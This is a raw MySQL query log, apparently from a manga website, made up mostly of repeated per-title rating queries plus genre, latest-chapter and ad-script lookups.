330640665 Quit 330640667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330640666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640667 Quit 330640664 Quit 330640668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640666 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330640668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330640668 Quit 330640666 Quit 330640669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330640669 Quit 330640670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330640670 Quit 330640671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330640671 Quit 330640672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330640672 Quit 330640673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330640673 Quit 330640674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330640674 Quit 330640675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330640675 Quit 330640676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330640676 Quit 330640677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330640677 Quit 330640678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330640678 Quit 330640679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330640679 Quit 330640680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330640680 Quit 330640681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330640681 Quit 330640683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330640683 Quit 330640684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330640682 Quit 330640684 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640685 Quit 330640684 Quit 330640686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330640687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640686 Quit 330640688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330640687 Quit 330640689 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640688 Quit 330640689 Quit 330640690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330640691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640690 Quit 330640692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640691 Quit 330640692 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640692 Quit 330640693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330640693 Quit 330640694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330640694 Quit 330640695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330640695 Quit 330640696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330640696 Quit 330640697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330640697 Quit 330640698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330640698 Quit 330640699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330640699 Quit 330640700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330640700 Quit 330640701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330640701 Quit 330640702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330640702 Quit 330640703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330640703 Quit 330640704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330640704 Quit 330640705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330640705 Quit 330640706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330640706 Quit 330640707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330640707 Quit 330640708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330640708 Quit 330640709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330640709 Quit 330640710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330640710 Quit 330640711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330640711 Quit 330640712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330640712 Quit 330640713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330640713 Quit 330640714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330640714 Quit 330640715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330640715 Quit 330640716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330640716 Quit 330640717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330640717 Quit 330640718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330640718 Quit 330640719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330640719 Quit 330640720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330640720 Quit 330640721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330640721 Quit 330640722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330640722 Quit 330640723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330640723 Quit 330640724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330640724 Quit 330640725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330640725 Quit 330640726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330640726 Quit 330640727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330640727 Quit 330640728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330640728 Quit 330640729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330640729 Quit 330640730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330640730 Quit 330640731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330640731 Quit 330640732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330640732 Quit 330640733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330640733 Quit 330640734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330640734 Quit 330640735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330640735 Quit 330640736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330640736 Quit 330640737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330640737 Quit 330640738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330640738 Quit 330640739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330640739 Quit 330640740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330640740 Quit 330640741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330640741 Quit 330640742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330640742 Quit 330640743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330640743 Quit 330640744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330640744 Quit 330640745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330640745 Quit 330640746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330640746 Quit 330640747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330640747 Quit 330640748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330640748 Quit 330640749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330640749 Quit 330640750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330640750 Quit 330640751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330640751 Quit 330640752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330640752 Quit 330640753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330640753 Quit 330640754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330640754 Quit 330640755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330640755 Quit 330640756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330640756 Quit 330640757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330640757 Quit 330640758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330640758 Quit 330640759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330640759 Quit 330640760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330640760 Quit 330640761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330640761 Quit 330640762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330640762 Quit 330640763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330640763 Quit 330640764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330640764 Quit 330640765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330640765 Quit 330640766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330640766 Quit 330640767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330640767 Quit 330640768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330640768 Quit 330640769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330640769 Quit 330640770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330640770 Quit 330640771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330640771 Quit 330640772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330640772 Quit 330640773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330640773 Quit 330640774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330640774 Quit 330640775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330640775 Quit 330640776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330640776 Quit 330640777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330640777 Quit 330640778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330640778 Quit 330640779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330640779 Quit 330640780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330640780 Quit 330640781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330640781 Quit 330640782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330640782 Quit 330640783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330640783 Quit 330640784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330640784 Quit 330640785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330640785 Quit 330640786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330640786 Quit 330640787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330640787 Quit 330640788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330640788 Quit 330640789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330640789 Quit 330640790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330640790 Quit 330640791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330640791 Quit 330640792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330640792 Quit 330640793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330640793 Quit 330640794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330640645 Quit 330640794 Quit 330640796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330640795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640796 Quit 330640795 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330640797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330640797 Quit 330640798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330640798 Quit 330640799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330640799 Quit 330640800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330640800 Quit 330640801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330640801 Quit 330640802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330640802 Quit 330640803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330640803 Quit 330640804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330640804 Quit 330640805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330640805 Quit 330640806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330640806 Quit 330640807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330640807 Quit 330640808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330640808 Quit 330640809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330640809 Quit 330640810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330640810 Quit 330640811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330640811 Quit 330640812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330640812 Quit 330640813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330640813 Quit 330640814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330640814 Quit 330640815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330640815 Quit 330640816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330640816 Quit 330640817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330640817 Quit 330640818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640818 